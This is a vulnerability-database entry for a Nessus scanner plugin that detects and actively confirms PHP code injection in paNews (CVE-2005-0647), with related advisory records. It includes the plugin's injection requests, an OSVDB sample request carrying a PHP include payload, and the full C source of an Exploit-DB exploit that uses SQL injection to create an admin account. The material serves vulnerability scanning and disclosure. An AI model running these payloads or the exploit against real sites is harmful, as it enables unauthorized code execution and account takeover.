ID PANEWS_ADMIN_SETUP_PHP.NASL Type nessus Reporter This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2005-02-23T00:00:00
Description
The remote host is running a version of paNews that fails to properly
sanitize input passed to the script 'includes/admin_setup.php' and, in
addition, allows writes by the web user to the directory 'includes'
(not the default configuration). Taken together, these flaws allow a
remote attacker to run arbitrary code in the context of the user
running the web service or to read arbitrary files on the target.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration phase: when 'description' is true the plugin only records the
# metadata below and exits before any request is sent to the target.
if (description)
{
  # Plugin identity and advisory cross-references.
  script_id(17201);
  script_version("1.20");
  script_cve_id("CVE-2005-0647");
  script_bugtraq_id(12611);

  script_name(english:"paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection");

  # Operator-facing text. The description notes that code execution also
  # depends on a non-default, web-writable 'includes' directory.
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple flaws." );
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of paNews that fails to properly
sanitize input passed to the script 'includes/admin_setup.php' and, in
addition, allows writes by the web user to the directory 'includes'
(not the default configuration). Taken together, these flaws allow a
remote attacker to run arbitrary code in the context of the user
running the web service or to read arbitrary files on the target." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2005/Feb/523" );
  script_set_attribute(attribute:"solution", value:
"Change the permissions on the 'includes/' directory so that the web
user cannot write to it." );

  # Severity scoring: CVSS v2 and v3.0 base and temporal vectors.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  # Publication and maintenance dates.
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/23");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/03/02");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_summary(english:"Checks for remote code execution in admin_setup.php in paNews");
  # Declared as ACT_ATTACK. When safe checks are off, the check code in this
  # file sends a request intended to create includes/config.php on the target.
  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"CGI abuses");

  # Scheduling constraints: the detection plugin is a dependency; the
  # exclude/require keys and ports gate whether this plugin is run.
  script_dependencies("panews_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");

  exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
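# Check phase. Depending on safe_checks(), either flag the install from its
# recorded version string alone, or actively confirm the flaw over HTTP.
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

# Test an install.
# The KB entry for this port is parsed below as "<version> under <path>".
install = get_kb_item("www/" + port + "/panews");
if (isnull(install)) exit(0);
matches = pregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  ver = matches[1];
  # Keep the path exactly as recorded for building request URLs, and use the
  # sanitized copy only in report text. Sending requests to the sanitized
  # path would probe the wrong location (a missed finding) whenever
  # sanitization rewrites part of the path.
  dir = matches[2];
  report_dir = data_protection::sanitize_user_paths(report_text:dir);

  if (safe_checks()) {
    # Version-only determination: nothing is sent to the application here.
    # NOTE(review): the trailing '$' applies to both alternatives, so
    # '[0-1]\.' only matches a version string that ends right after the dot.
    # Confirm against the version format panews_detect.nasl stores.
    if (ver =~ "^([0-1]\.|2\.0b[0-4])$") {
      security_hole(port:port, extra:
"***** Nessus has determined the vulnerability exists on the target
***** simply by looking at the version number of paNews
***** installed there.
");
    }
  }
  else {
    # Active confirmation. This path changes state on the target: a
    # successful first request leaves includes/config.php behind, and the
    # plugin does not remove it. The report tells the operator to clean up.

    # Create includes/config.php.
    r = http_send_recv3(method:"GET", port: port,
      # nb: with a slightly different URL, you can run programs on the target.
      item:dir + "/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)");
    if (isnull(r)) exit(0);

    if (r[0] =~ "^HTTP/.* 200 OK") {
      # And now run it to include paNews Readme.txt in the top-level directory.
      r = http_send_recv3(method:"GET", port: port,
        # nb: if PHP's allow_url_fopen is enabled, you could also open
        #     remote URLs with arbitrary PHP code.
        item:dir + "/includes/config.php?nst=../Readme.txt" );
      if (isnull(r)) exit(0);
      res = r[2];
      # The address below is used as the marker that the Readme content was
      # returned, i.e. that the written config.php executed the include.
      if ("bugs@phparena.net" >< res) {
        # The lead-in line states what was done to the target, so the path
        # and the cleanup advice that follow read as a complete finding.
        security_hole(port:port, extra:
          string(
            "***** Nessus confirmed the issue by creating or overwriting the file\n",
            "***** ", report_dir + "/includes/config.php\n",
            "***** in the webserver's document directory. This file should be\n",
            "***** deleted as soon as possible.\n\n"));
      }
    }
  }
}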
{"id": "PANEWS_ADMIN_SETUP_PHP.NASL", "bulletinFamily": "scanner", "title": "paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection", "description": "The remote host is running a version of paNews that fails to properly\nsanitize input passed to the script 'includes/admin_setup.php' and, in\naddition, allows writes by the web user to the directory 'includes'\n(not the default configuration). Taken together, these flaws allow a\nremote attacker to run arbitrary code in the context of the user\nrunning the web service or to read arbitrary files on the target.", "published": "2005-02-23T00:00:00", "modified": "2005-02-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/17201", "reporter": "This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://seclists.org/fulldisclosure/2005/Feb/523"], "cvelist": ["CVE-2005-0647"], "type": "nessus", "lastseen": "2021-01-20T13:25:35", "edition": 28, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0647"]}, {"type": "osvdb", "idList": ["OSVDB:15452"]}, {"type": "exploitdb", "idList": ["EDB-ID:866"]}, {"type": "nessus", "idList": ["PANEWS_INPUT_VULNS.NASL"]}], "modified": "2021-01-20T13:25:35", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-20T13:25:35", "rev": 2}, "vulnersScore": 6.8}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(17201);\n script_version(\"1.20\");\n script_cve_id(\"CVE-2005-0647\");\n script_bugtraq_id(12611);\n\n script_name(english:\"paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple 
flaws.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of paNews that fails to properly\nsanitize input passed to the script 'includes/admin_setup.php' and, in\naddition, allows writes by the web user to the directory 'includes'\n(not the default configuration). Taken together, these flaws allow a\nremote attacker to run arbitrary code in the context of the user\nrunning the web service or to read arbitrary files on the target.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Feb/523\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Change the permissions on the 'includes/' directory so that the web\nuser cannot write to it.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/03/02\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for remote code execution in admin_setup.php in paNews\");\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CGI abuses\");\n \n script_dependencies(\"panews_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(\"www/\" + port + \"/panews\");\nif (isnull(install)) exit(0);\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = data_protection::sanitize_user_paths(report_text:matches[2]);\n\n if (safe_checks()) {\n if (ver =~ \"^([0-1]\\.|2\\.0b[0-4])$\") {\n security_hole(port:port, extra: \n\"***** Nessus has determined the vulnerability exists on the target\n***** simply by looking at the version number of paNews\n***** installed there.\n\");\n }\n }\n else {\n # Create includes/config.php.\n r = http_send_recv3(method:\"GET\", port: port,\n # nb: with a slightly different URL, you can run programs on the target.\n item:dir + \"/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)\");\n if (isnull(r)) exit(0);\n\n if (r[0] =~ \"^HTTP/.* 200 OK\") {\n # And now run it to include paNews Readme.txt in the top-level directory.\n r = http_send_recv3(method:\"GET\", port: port, \n # nb: if PHP's allow_url_fopen is enabled, you could also open\n # remote URLs with arbitrary PHP code.\n item:dir + \"/includes/config.php?nst=../Readme.txt\" );\n if (isnull(r)) exit(0);\n res = r[2];\n if (\"bugs@phparena.net\" >< res) {\n security_hole(port:port, extra:\nstring(\n \"***** \", dir + \"/includes/config.php\\n\",\n \"***** in the webserver's document directory. 
This file should be\\n\",\n \"***** deleted as soon as possible.\\n\\n\"));\n }\n }\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "17201", "cpe": [], "scheme": null, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}}
{"cve": [{"lastseen": "2021-02-02T05:24:35", "description": "admin_setup.php in paNews 2.0.4b allows remote attackers to inject arbitrary PHP code via the (1) $form[comments] or (2) $form[autoapprove] parameters, which are written to config.php.", "edition": 4, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0647", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0647"], "modified": "2016-10-18T03:13:00", "cpe": ["cpe:/a:php_arena:panews:2.0.4b"], "id": "CVE-2005-0647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0647", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php_arena:panews:2.0.4b:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:11", "bulletinFamily": "software", "cvelist": ["CVE-2005-0647"], "edition": 1, "description": "## Vulnerability Description\npaNews contains a flaw that may allow an attacker to inject arbitrary PHP code. The issue is due to the $$comments or $$autapprove variables in the admin_setup.php script not being properly sanitized and may allow an attacker to inject PHP code. Other variables may also be effected.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\npaNews contains a flaw that may allow an attacker to inject arbitrary PHP code. 
The issue is due to the $$comments or $$autapprove variables in the admin_setup.php script not being properly sanitized and may allow an attacker to inject PHP code. Other variables may also be effected.\n## Manual Testing Notes\nGET http://hawking/panews/index.php?action=admin&op=setup&form[lang]=english&form[comments]=1&form[autoapprove]=1;%20?%3E%20%3C?%20include(%22/var/cpuinfo%22);%20?%3E%20%3C?%20$trivial=1 HTTP/1.1\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nAccept-Encoding: gzip,deflate\nAccept-Language: en-us,en;q=0.5\nHost: hawking\nReferer: http://hawking/panews/index.php\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0\nCookie: panews=%BF%3F%BF%3F0%BF%3F1108908178%BF%3F%BF%3Fframe%BF%3F0; IS_PANEWS=1\nKeep-Alive: 300\n## References:\nOther Advisory URL: http://www.kernelpanik.org/docs/kernelpanik/panews.txt\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=110969774502370&w=2\n[CVE-2005-0647](https://vulners.com/cve/CVE-2005-0647)\n", "modified": "2005-03-01T23:14:28", "published": "2005-03-01T23:14:28", "href": "https://vulners.com/osvdb/OSVDB:15452", "id": "OSVDB:15452", "title": "paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:03:31", "description": "paNews 2.0b4 Remote Admin Creation SQL Injection Exploit. CVE-2005-0647. 
Webapps exploit for php platform", "published": "2005-03-08T00:00:00", "type": "exploitdb", "title": "paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0647"], "modified": "2005-03-08T00:00:00", "id": "EDB-ID:866", "href": "https://www.exploit-db.com/exploits/866/", "sourceData": "/***************************************************\r\n* *\r\n* paNews v2.0b4 *\r\n* *\r\n* silePNEWSxpl *\r\n* This exploit utilize SQL injection for create *\r\n* a new user with admin privileges on paNews *\r\n* software system. *\r\n* *\r\n* References: *\r\n* packetstormsecurity.org/0503-exploits/panews.txt *\r\n *\r\n* *\r\n* coded by: Silentium of Anacron Group Italy *\r\n* date: 04/03/2005 *\r\n* e-mail: anacrongroupitaly[at]autistici[dot]org *\r\n* my_home: www.autistici.org/anacron-group-italy *\r\n* *\r\n* this tool is developed under GPL license *\r\n* no(c) .:. copyleft *\r\n* *\r\n***************************************************/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n\r\n#define PORT 80 // port of the web server\r\n\r\nvoid info(void);\r\nvoid sendxpl(int sock, char *argv[]);\r\nvoid errsock(void);\r\nvoid errgeth(void);\r\nvoid errconn(void);\r\n\r\nint main(int argc, char *argv[]){\r\n\r\nint sock, sockconn;\r\nstruct sockaddr_in addr;\r\nstruct hostent *hp;\r\n\r\nif(argc!=4)\r\n info();\r\n\r\nif((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n errsock();\r\n\r\nsystem(\"clear\");\r\nprintf(\"[*] Creating socket [OK]\\n\");\r\n\r\nif((hp = gethostbyname(argv[1])) == NULL)\r\n errgeth();\r\n\r\nprintf(\"[*] Resolving victim host [OK]\\n\");\r\n\r\nmemset(&addr,0,sizeof(addr));\r\nmemcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);\r\naddr.sin_family = AF_INET;\r\naddr.sin_port = htons(PORT);\r\n\r\nsockconn = connect(sock,(struct sockaddr 
*)&addr,sizeof(addr));\r\nif(sockconn < 0)\r\n errsock();\r\n\r\nprintf(\"[*] Connecting at victim host [OK]\\n\");\r\n\r\nsendxpl(sock, argv);\r\n\r\nprintf(\"[*] Now check on\\n\"\r\n \" http://%s%s\\n\\n\"\r\n \" your username: %s\\n\"\r\n \" with password: anacron\\n\\n\",argv[1],argv[2],argv[3]);\r\n\r\nshutdown(sock, 2);\r\nclose(sock);\r\n\r\nreturn(0);\r\n\r\n}\r\n\r\nvoid info(void){\r\n\r\nsystem(\"clear\");\r\nprintf(\"#########################################\\n\"\r\n \"# paNews v2.0b4 exploit #\\n\"\r\n \"#########################################\\n\"\r\n \"# this exploit create a new user admin #\\n\"\r\n \"# on paNews software system. #\\n\"\r\n \"# exploit coded by Silentium #\\n\"\r\n \"# Anacron Group Italy #\\n\"\r\n \"# www.autistici.org/anacron-group-italy #\\n\"\r\n \"#########################################\\n\\n\"\r\n \"[usage]\\n\\n\"\r\n \" silePNEWSxpl <victim> <path_paNews> <username>\\n\\n\"\r\n \"[example]\\n\\n\"\r\n \" silePNEWSxpl www.victim.com /panews/index.php silentium\\n\\n\");\r\nexit(1);\r\n\r\n}\r\n\r\nvoid sendxpl(int sock, char *argv[]){\r\n\r\nFILE *out;\r\nint size = 264;\r\nout = fdopen(sock,\"a\");\r\nsetbuf(out,NULL);\r\n\r\nsize+=(strlen(argv[3]) * 2);\r\n\r\nfprintf(out,\"POST %s HTTP/1.0\\n\"\r\n \"Connection: Keep-Alive\\n\"\r\n \"Pragma: no-cache\\n\"\r\n \"Cache-control: no-cache\\n\"\r\n \"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\\n\"\r\n \"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\\n\"\r\n \"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\\n\"\r\n \"Accept-Language: en\\n\"\r\n \"Host: %s\\n\"\r\n \"Referer: http://%s%s\\n\"\r\n \"Content-Type: application/x-www-form-urlencoded\\n\"\r\n \"Content-Length: %d\\n\\n\"\r\n \"action%%3Dlogin%%26username%%3D%s%%26password%%3Danacron%%26\"\r\n \"mysql_prefix%%3Dpanews_auth%%60%%20VALUES%%20(%%22%%22,%%22\"\r\n \"%s%%22,%%22f63140655b379e65f6cd87fa3c3da631%%22,%%22\"\r\n 
\"hackit%%22,%%22admins%%7Ccat%%7Ccomment%%7Cnewsadd%%7Cnewsedit\"\r\n \"%%7Cprefset%%7Csetup%%22,%%22none%%22,%%22127.0.0.1%%22\"\r\n \",1,1)%%00\\n\\n\",argv[2],argv[1],argv[1],argv[2],size,argv[3],argv[3]);\r\n\r\n printf(\"[*] Sending exploit [OK]\\n\\n\");\r\n\r\n}\r\n\r\nvoid errsock(void){\r\n\r\nsystem(\"clear\");\r\nprintf(\"[x] Creating socket [FAILED]\\n\\n\");\r\nexit(1);\r\n\r\n}\r\n\r\nvoid errgeth(void){\r\n\r\nprintf(\"[x] Resolving victim host [FAILED]\\n\\n\");\r\nexit(1);\r\n\r\n}\r\n\r\nvoid errconn(void){\r\n\r\nprintf(\"[x] Connecting at victim host [FAILED]\\n\\n\");\r\nexit(1);\r\n\r\n}\n\n// milw0rm.com [2005-03-08]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/866/"}], "nessus": [{"lastseen": "2021-01-20T13:25:35", "description": "The remote host is running a version of paNews that suffers from the\nfollowing vulnerabilities:\n\n - SQL Injection Issue in the 'login' method of includes/auth.php.\n A remote attacker can leverage this vulnerability to add \n users with arbitrary privileges.\n\n - Local Script Injection Vulnerability in includes/admin_setup.php.\n A user defined to the system (see above) can inject arbitrary\n PHP code into paNews' config.php via the 'comments' and \n 'autapprove' parameters of the 'admin_setup.php'\n script.", "edition": 26, "published": "2005-03-18T00:00:00", "title": "paNews 2.0.4b Multiple Input Validation Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0647", "CVE-2005-0646"], "modified": "2005-03-18T00:00:00", "cpe": [], "id": "PANEWS_INPUT_VULNS.NASL", "href": "https://www.tenable.com/plugins/nessus/17574", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(17574);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2005-0646\", 
\"CVE-2005-0647\");\n script_bugtraq_id(12687);\n\n script_name(english:\"paNews 2.0.4b Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple flaws.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of paNews that suffers from the\nfollowing vulnerabilities:\n\n - SQL Injection Issue in the 'login' method of includes/auth.php.\n A remote attacker can leverage this vulnerability to add \n users with arbitrary privileges.\n\n - Local Script Injection Vulnerability in includes/admin_setup.php.\n A user defined to the system (see above) can inject arbitrary\n PHP code into paNews' config.php via the 'comments' and \n 'autapprove' parameters of the 'admin_setup.php'\n script.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.kernelpanik.org/docs/kernelpanik/panews.txt\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Mar/20\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/03/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/03/02\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_summary(english:\"Detects input validation vulnerabilities in paNews\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n \n script_dependencies(\"panews_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/panews\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/panews\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n\n if (ver && ver =~ \"^([0-1]\\.|2\\.0b[0-4])$\")\n {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}